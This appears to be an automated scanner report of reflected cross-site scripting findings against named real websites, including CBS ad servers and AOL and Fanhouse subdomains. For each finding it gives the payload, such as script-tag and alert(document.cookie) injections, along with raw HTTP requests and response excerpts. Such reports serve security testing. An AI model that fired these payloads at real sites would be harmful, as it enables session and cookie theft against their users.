Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711dba23*/alert(1)//ccaf888c20c&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:34:47 GMT Server: Apache/2.2 Content-Length: 1173 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:34:47 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711dba23*/alert(1)//ccaf888c20c&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default a ...[SNIP]...
The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 1857c<a>4edf02830e0 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=67111857c<a>4edf02830e0&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=67111857c<a>4edf02830e0&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT M ...[SNIP]...
The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 37931<a>6c42c321af7 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=16437931<a>6c42c321af7&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=16437931<a>6c42c321af7&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: C ...[SNIP]...
The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 177ed<a>5d4faf2f940 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1177ed<a>5d4faf2f940&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1177ed<a>5d4faf2f940&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='1 ...[SNIP]...
The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 89391*/alert(1)//284c42343f2 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=189391*/alert(1)//284c42343f2&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:35:48 GMT Server: Apache/2.2 Content-Length: 1146 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:35:48 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=189391*/alert(1)//284c42343f2&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
1.150. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://mads.cbs.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ebb1<a>851735ff48a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1&6ebb1<a>851735ff48a=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1&6ebb1<a>851735ff48a=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _RGROUP *//* M ...[SNIP]...
1.151. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mads.cbs.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 8e53e*/alert(1)//a041a4ab76d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1&8e53e*/alert(1)//a041a4ab76d=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:37:33 GMT Server: Apache/2.2 Content-Length: 1156 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:37:33 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1&8e53e*/alert(1)//a041a4ab76d=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload e876d*/alert(1)//2d9085e2f91 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859e876d*/alert(1)//2d9085e2f91&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:36:08 GMT Server: Apache/2.2 Content-Length: 1147 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:36:08 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859e876d*/alert(1)//2d9085e2f91&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload bca9a<a>70ad7b6acbd was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704bca9a<a>70ad7b6acbd&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704bca9a<a>70ad7b6acbd&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' D ...[SNIP]...
1.154. http://marlothomas.aol.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://marlothomas.aol.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58af7"><script>alert(1)</script>fb0308338b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?58af7"><script>alert(1)</script>fb0308338b0=1 HTTP/1.1 Host: marlothomas.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://marlothomas.aol.com/?58af7"><script>alert(1)</script>fb0308338b0=1" /> ...[SNIP]...
1.155. http://mlb.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mlb.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 885e5"-alert(1)-"db05883e06a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?885e5"-alert(1)-"db05883e06a=1 HTTP/1.1 Host: mlb.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 54f8b<script>alert(1)</script>5358b4f3ab0 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /reflector/setCookie?cb=54f8b<script>alert(1)</script>5358b4f3ab0& HTTP/1.1 Host: money.aol.com Proxy-Connection: keep-alive Referer: http://o.aolcdn.com/os/money/flash/DailyFinanceCookieProxy.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021680436-New%7C1360093680436%3B%20s_nrgvo%3DNew%7C1360093680440%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:47:20 GMT Server: Apache-Coyote/1.1 Content-Type: application/json;charset=UTF-8 Content-Length: 45
54f8b<script>alert(1)</script>5358b4f3ab0({})
1.157. http://motorsports.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://motorsports.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54b2"-alert(1)-"03ff745aee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b54b2"-alert(1)-"03ff745aee2=1 HTTP/1.1 Host: motorsports.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce3a"%3b1a4d966ae1a was submitted in the REST URL parameter 1. This input was echoed as fce3a";1a4d966ae1a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trailersfce3a"%3b1a4d966ae1a/main.adp HTTP/1.1 Host: movies.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334772668.1997950285.1031800576; path=/ Pragma: no-cache Cache-Control: no-store Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:23:09 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 44419 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head ...[SNIP]... <!-- s_265.server="acp-ld29.websys.aol.com"; s_265.mmxgo=true; s_265.pageName="mov: Page Not Found!"; s_265.channel="us.movies"; s_265.trackExternalLinks="true"; s_265.prop1="trailersfce3a";1a4d966ae1a"; s_265.pfxID="mov"; s_265.disablepihost=false; s_265.prop2="main.adp"; s_265.linkInternalFilters="javascript:,aol.com,moviefone.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
1.159. http://nba.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nba.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0eec"-alert(1)-"5808854bd27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c0eec"-alert(1)-"5808854bd27=1 HTTP/1.1 Host: nba.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.160. http://ncaabasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ncaabasketball.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6117e"-alert(1)-"46f14e1380e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?6117e"-alert(1)-"46f14e1380e=1 HTTP/1.1 Host: ncaabasketball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.161. http://ncaafootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ncaafootball.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11a90"-alert(1)-"2a24bc7b009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?11a90"-alert(1)-"2a24bc7b009=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79615"><script>alert(1)</script>45b412626c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia79615"><script>alert(1)</script>45b412626c9/Retarget_Secure/642496272@Bottom3?_RM_HTML_MM_=500101500015500001101 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI
Response
